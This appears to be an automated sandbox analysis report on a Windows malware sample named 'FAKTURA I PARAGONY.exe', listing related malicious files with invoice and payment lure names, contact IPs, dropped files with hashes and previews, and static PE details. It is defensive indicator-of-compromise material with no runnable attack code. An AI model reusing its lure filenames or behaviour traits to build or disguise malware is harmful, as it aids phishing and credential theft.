	Swift USD 9300.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.Trojan.GenericKDZ.78846.22148.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.Trojan.GenericKDZ.78846.12476.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.Trojan.GenericKDZ.78846.22148.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.Trojan.GenericKDZ.78846.12476.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.W32.AIDetect.malware1.12761.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.W32.AIDetect.malware1.12761.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Foreign_Bank Account Details.exe	Get hash	malicious	Browse
	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	Get hash	malicious	Browse
	1gPmnCR2PX.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	l8w9YB1n38.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse
	Udtrt.exe	Get hash	malicious	Browse
	MT103_SWIFT.exe	Get hash	malicious	Browse
	MT103_SWIFT.exe	Get hash	malicious	Browse
	EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exe	Get hash	malicious	Browse
	tZz20galQf.exe	Get hash	malicious	Browse
	Guloader.exe	Get hash	malicious	Browse
	8hIPR0n66X.dll	Get hash	malicious	Browse
	Struggleres5.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	LISTA DE PEDIDO DE COMPRA.exe	Get hash	malicious	Browse
	Unreal.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, 61157 bytes, 1 file
Category:	dropped
Size (bytes):	61157
Entropy (8bit):	7.995991509218449
Encrypted:	true
SSDEEP:	1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
MD5:	AB5C36D10261C173C5896F3478CDC6B7
SHA1:	87AC53810AD125663519E944BC87DED3979CBEE4
SHA-256:	F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
SHA-512:	E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
Malicious:	false
Preview:	MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....\|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.\|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"\|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....\|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..\|.!k0...\|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..\|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'\|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.773803200765873
Encrypted:	false
SSDEEP:	3:kkFklhykfllXlE/zMcSllh/tNNX8RolJuRdyo1dlUKlGXJlDdt:kKz1I7NMa8Rdy+UKcXP
MD5:	F80B71C89A3E6AC19F330E1FFF75B8DC
SHA1:	0DED612CA4F8FE979B01215DD5541401D34799C8
SHA-256:	4658A75A82042D0BCEB4DA7BF48C4AF32E39EFD1412F9C7C375E174BB24DB89A
SHA-512:	2F9F0A0689F207CA29C72FC8F61219A1F812AC9947133BC4238C68F66A698DDE812EE70318119126E219FC9AA61B799712D10F81047A0B860FEC3351AAE67BEB
Malicious:	false
Preview:	p...... ...............(....................................................... ..........~...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.102288469951472
Encrypted:	false
SSDEEP:	6:kKwdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:62kPlE99SNxAhUefit
MD5:	F4A7236428EC4897A7C3CEE487D5FD13
SHA1:	043C09FA870F934398CD70A2BA5206C03BCBE187
SHA-256:	275BC2A37B4A17304489B33445FA52A722BFCADF09AE419D8B9329CCA541B6EF
SHA-512:	4AECACE983B7AA6E9BC1992035E74C0315293743BCBE1236D77D286826A07A031BA40AD2362345B39B33FBD52CADA4ED64CE680BEA94523617F0DBEBCA738D6C
Malicious:	false
Preview:	p...... ................(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	data
Category:	dropped
Size (bytes):	2651471
Entropy (8bit):	7.999536893169429
Encrypted:	true
SSDEEP:	49152:PATHbjm/iIcfAPkDFdv14M/XGgXqzwoDXK0wo2Ufj8BYuMmLNaCvruHEmWE:PgbHIvq/vlPGgap60PJ8TJaGrMOE
MD5:	15BC5469BEBD01AD2E2A53F66D88D920
SHA1:	123EA8DFF16F084DC27352CE1A10D723F9833874
SHA-256:	623CA36626BACABBDD43740F875A2FE04DD3D5881CBB978FA53848202AB4F9B7
SHA-512:	46DBA1D21EF2D1891D16C08A4BF0051E14B951BE04355EC2F20F5E9CF1AB707BCD2577B63955C586E53B86F3B6B53B6AB2409E0DE47795359186FA2362C3A2F0
Malicious:	false
Preview:	PA19.....%ea(\|f..b...h ..cI....(j!.n.\|...w.p...!..D..=.......""H..;%.P.#.Q.....Tm.Rth.(Za.%...Z.;...."....................}...5/2-....{0Il....{..no...~o^w...................q....{...o...._.}qwz..l.;...&.z...{..n.[.n......[oN......6.MG.@n.O...$..m.K.a.....H..........(..!.P......_./@ $.1....Y.......6.....;Y..\.u...`W.G .d.e....XG+)$A.r$......H..<....Jf. )..L 0r.mc..n(.K.e @n8.-.A.2Gw..,...lld.32..bs.6....Q.....cj..4.o....L.<21....&r@AInLb...%.......9..tp.$'Q..r.S..o.9...e].....hr.W...,CAo/I......~....z.H........o.$.}...........................f..f.........;.9.w.9...3..r.2.6.2w.....]..T%..I..W.TR.2.47.Q!...,...ie..$......,M.....Ah..2....P.. ......'y..S}.A.M.....2..U.u.}.A.Q..Km.q.\,..eUQ..0.[G.......]A.y:.-....p..5.c..^._.=a.I^s7..~.......S..\...;.$,8.e]9.].r9=a.:..~3 '...&.x.{.)....L.G5.9.0...Bk....2...5.#]...^iM.z@f.....f.n.....Z.{.[%-.}.S]W]..b..$...g}...nM..e....L.V..D+[......?.~=.....6+..S..R......J..O.r.....rC....Vo..+.J>....

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpasbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	data
Category:	dropped
Size (bytes):	6947288
Entropy (8bit):	7.998652520745969
Encrypted:	true
SSDEEP:	196608:Z6h8S1WVWjjc7Wf7zlW0qg2eUCJj6oZT32FBN6DIz:M+S1q7S7BWvMzJxBYHz
MD5:	46F037977005B7E9F8711C1CE7245C6B
SHA1:	B04BB6DE0F9F5A2B12C52124AD514D324EF3B616
SHA-256:	3D38C95836DB5540D4354BDA13A83091BF144A907A831604898D9F864126A4D0
SHA-512:	8D84FDCE9A81422A10AA1CC6B450EEA1E593F16DBF57D00A313C3AA9B03BB41F6A94FF8D4739C1ED79B3ED6F1CBF203F455BCCE6654C103BB5294599E47CDC16
Malicious:	false
Preview:	MPSP..j.....8..x..]u\.O._:D$$.E0.AEQQLJ......T..y..n.DA.1PT.n1...nL...;..{.{..q............&..\|."S....J....W..TR..)W..[5J..!..&...e...=...Y.$mdz..R.V.".FQ.....iI.ljk.....!J.Sem...Q>.....+T.6..y..\W.u...P../..=.2Mox...~..k.n...........V....O3U....wS%6....D.2)NC..q!..2.-J..h=~i.p...DF4.&#.x......54.z.\|.(W..Li..`2.R?.^W2.2.kfB.$d..3..(>..iJ...9.$..J..H.dB...LcmU.:..U.....Ua...H.FS..yE...E;..`..P#..M.!.j..6....M..Z.......C...@.<..Kj..T.......mU...2.D.C.....PG.&.)9.M..AU.......LM;fm={..n....!J.SW74.......jS.h-..J9....I.%'.c.....t..(.....aQ..X..L.;.....k.i..>N.!.i..y.X.2..g...j.,=.>..7m..A....9@........5.J......Kw..0W..r2.)...h...(i>.&>A0...`D.c...).3.mL......;.&..6......)...E....)J..?K..%..;..D]..(S.yx.g.B]....D........5..5...L.+Y.N..R3..z.s.....5H..Y.....$../o.$....(.fx-/.";.no.M...vn...l..p.f.*.......X.;W..90..A...kH6^C.u..l...6.....:.P......\|.F.k.(..t.....3s..iT...;%.e.D..'m.e.r..YP......^1,...........2O..,`........IQ<K.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	data
Category:	dropped
Size (bytes):	5295896
Entropy (8bit):	7.997749364950445
Encrypted:	true
SSDEEP:	98304:+3t2My1jJFqD1nlxmI5zN8KGixmH8l2snrho+qico1hSWmnSEOR69MaKJD:+92M8DqTx/dN81iUHooKcofHDZEMaKJD
MD5:	F2E9F2343E044B331ECAF82302F5EC4B
SHA1:	049E866B3C7385DD7B00BBEC39453C30B8D29C28
SHA-256:	77AF289327742CC4F520092AA6429A5B829E24F40653DF71D00E31EFF9F3737F
SHA-512:	080509E98915BE390AE6A1ABA880248E98DE10D77AF107FB266DC34CECD43EED9CE77F53C6568C20FA1222DBA1D3FDB79E820656C0B28E1316DA93500C580A79
Malicious:	false
Preview:	MPSP..P..Au.[.Aex.l..xTW.6.I ......'..C\p.Dq.....<..!..Cp.BK..H.B..w.s2....}.{]o.s.......j.)m.e._....N.L.,...:......!..g.UN.sH.t../...\|6F.F.C.f....d..N./.2^.bc..)..6...F![...BJ&.g\....%....f5.r.:...L..$..L6&.,.v=.Me..F...lF.Ou;.C....R..3.).....G...,..../..f.7U..o.2....VA..OV.7r.\|.......M?......eS$K...w.ic......y^S..&S.e.J..3..`2.y..4...iT.3..+mL(W'....L...&..&..1MI_J..\|...f..eZ..dZ{&.i.n...e.s.X..).i..th...._M...f..mLgc...3..n.C....25.5=X]..8}.k.!YR..8{>...u...`H.c'.w.K.sxN........z.0.......MN..m.lk........&4..zY....?..O..@f..j.@...i ..}..jH..tf5ekb.........^...T.4...m.c[.ZY....YZ.l.T..u.....g1..~.eV. F....d.o....M<.5L7..AOl.+......D`l...hO.'..X..;.x...=q....zS..c".J.....1D.s...(1T..`zc...q...Q.74..I.ug.(.0..g.D;1..Ty..3.....t.}......a...`.D..I.`"1..L7.`....A.p.............g..M..........J.../.6..._..-e.i.h.z.J...ALw..[...3d...iLo.)..$.?Nk..,a...V.++..v.-I.T~..M..'1}qj.,.....O.......X..3_.p...\|z6.pm.........+.).,....^.j.h...d4..D..[,.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Foreign_Bank Account Details.exe, Detection: malicious, Browse Filename: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs, Detection: malicious, Browse Filename: 1gPmnCR2PX.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: l8w9YB1n38.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse Filename: Udtrt.exe, Detection: malicious, Browse Filename: MT103_SWIFT.exe, Detection: malicious, Browse Filename: MT103_SWIFT.exe, Detection: malicious, Browse Filename: EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exe, Detection: malicious, Browse Filename: tZz20galQf.exe, Detection: malicious, Browse Filename: Guloader.exe, Detection: malicious, Browse Filename: 8hIPR0n66X.dll, Detection: malicious, Browse Filename: Struggleres5.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: LISTA DE PEDIDO DE COMPRA.exe, Detection: malicious, Browse Filename: Unreal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53072304
Entropy (8bit):	7.997563930648501
Encrypted:	true
SSDEEP:	1572864:P0U1SslLDBQpTRKb0o76I0RUgRS2uc62zNWPy:P0UplL2tRW0aV0RpS2lTey
MD5:	0157CF1D00DB2F06270440CED26AD2DA
SHA1:	E0DA67E235AF6B8DDBA9736504E7638BFF4DB4B0
SHA-256:	15C43FFD2F73BA5E6A0E0A3B845A6FD61EE9E12220C0D98CBDB9E59D6E188914
SHA-512:	0264329D824734BC9BFE3129E4653E5293EFC96555EE98909DD19B37A010747C6368247784972AE478DBC16EF5E031FF99A283CF371F21278DBCE9E94DABAAC5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........)...............................................).......)...`.......................................................... ....)...........)..!...........................................................................................rdata..p...........................@..@.rsrc.....).. ....).................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...)..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590768
Entropy (8bit):	7.995607164320088
Encrypted:	true
SSDEEP:	12288:jelAo91I34Dl7OSom9zYukvli2CtLTN0dEyG/ryzIAg2Y8i+Mm:iGGRhOoJYq2CtL6G/rCj9Mm
MD5:	D3D8F863952CE10ADE4319482D4A5B28
SHA1:	F655FC23421E4EEDCD18AEBF8FB6E9F439BC686F
SHA-256:	B4EE6BF3E98991CADB83614425214C45883C7E6C924562A55E3D4B25E69A6A62
SHA-512:	C6199B6108B6CB8FE428DD5E3AE7BB19D58E182DFA5DEF87921630D29BEC5E0CA057CA6DD0872058ADC0D0EBAA98B0295A8780AE74400B6A33C38E5EB38B8BB5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.... ea.........." .................................................................+....`.......................................................... ...................!...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@..... ea........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55848880
Entropy (8bit):	7.995585481148423
Encrypted:	true
SSDEEP:	1572864:iy6w1liQqicAsNBasl5IY/hOO0S7WGB9F9L4hxZB:B6uiQqiTE8kIYJn+wFZ4XB
MD5:	7E2B83A39CC26B2B617F404A89B6661C
SHA1:	198F9D59A90993247182EE11AE33AB52E5011C44
SHA-256:	8ED02ED1D817FA7B68466F11F55A2289D82BDD22A360246624BA0F9220D17EE3
SHA-512:	BF29A223DFF577DB8967DBEA610DC6DB2D6C0152A896E8BCC851EB67E84AF5367E4A01AC6110554C2813E974EBA9B8C04C2EB03422DCCDE00B1FA8D7F629C55F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........T..............................................0T.......T...`.......................................................... ..@.T...........T..!...........................................................................................rdata..p...........................@..@.rsrc...@.T.. ....T.................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ....T..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	235440
Entropy (8bit):	7.989341625913562
Encrypted:	false
SSDEEP:	3072:d3zk2No0flLXRzgF5+8/ofRoVjzx6/G2P4ddYRS848A6RqxC4UPJGCsYjBWW:dkV0dA+8co0GWm4dk6ROCJPJG+BWW
MD5:	C5974E8FEC38D3E17E0D6DC44D69B397
SHA1:	24640A78C49B2CCDF418D2164406FD528F5DF7B6
SHA-256:	653C1A629CEA89264D0BAF8BC5526E27D301FD700D78CA57D1B2F403C669EE3E
SHA-512:	56E393FED8C0D69DB251FB7E6BA450D887D0568757301565EDF121C37250898ECB68264CA5E2077BB7E71103B0BF04F9638CD092B12519D92412F0743AD89F30
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.... ea.........." .........t....................................................... ....`.......................................................... ..pp...........v...!...........................................................................................rdata..p...........................@..@.rsrc...pp... ...r..................@..@..... ea........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...o...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	10420
Entropy (8bit):	3.427461400203551
Encrypted:	false
SSDEEP:	96:BnwD21YmA2KxoZvHoBQE0KAK3ERK5W7i1zBe0KAK3ERK5Wgvdikynvz5fsDXycc:xshD2Kx0HosrcERohrrcERorzyrBs23
MD5:	BC7558BEEF83A62D1C0384D161F8BFA8
SHA1:	B1706CF275610F7D51A16D847EE2B2335FE8184F
SHA-256:	D51C3268988C2168A03A323EFA1D47171BB5A833AB06F5F9CC96FE351DFF93DE
SHA-512:	C39DBAEF1E6B87EE9E3F57373FA782147A135BD9796032B1C72020AC49B667B9AF6EE8DCB088E14440B7D6452F5479C0362B5C715744B1A7D3F88A75C479EA45
Malicious:	false
Preview:	..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.1.0.-.1.2. .1.5.:.4.1.:.5.0.Z.....P.r.o.c.e.s.s.:. .1.b.d.0...1.d.7.b.f.7.f.a.c.8.9.6.9.f.b.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.5.1...2.6.5...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.5.1.0.4.1.e.9.8...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.864427344075375
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FAKTURA I PARAGONY.exe
File size:	102400
MD5:	0277ce10266c718b31d46a622acf1a43
SHA1:	f9a05406e2407434e5359a8757d6f2bf0166b20e
SHA256:	1113efa42a416df493d712368060e751482e644c13f6c115a507ff001a322724
SHA512:	d95b4f43700508396a222d44e184846e5d48d3d6890899341c071d1be0d0c4bc29eb3a8aaae04127fad1e575bcaa4570cd556be0399404ba86abca357b3c1ff4
SSDEEP:	1536:tSDzKtMbun1t/WkXDEMlkZk7+QqwshFka4vrQD7ni6D:tSfqPzoUp+QshetC7i6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...>U=T.................P...0......x........`....@........

File Icon


Icon Hash:	69e1c892f664c884

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x543D553E [Tue Oct 14 16:54:22 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	669316531b5190f02843878b6ed87394

Entrypoint Preview

Instruction
push 0041060Ch
call 00007F1810FA2115h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc ecx
adc eax, B1D9BBEAh
jns 00007F1810FA2171h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
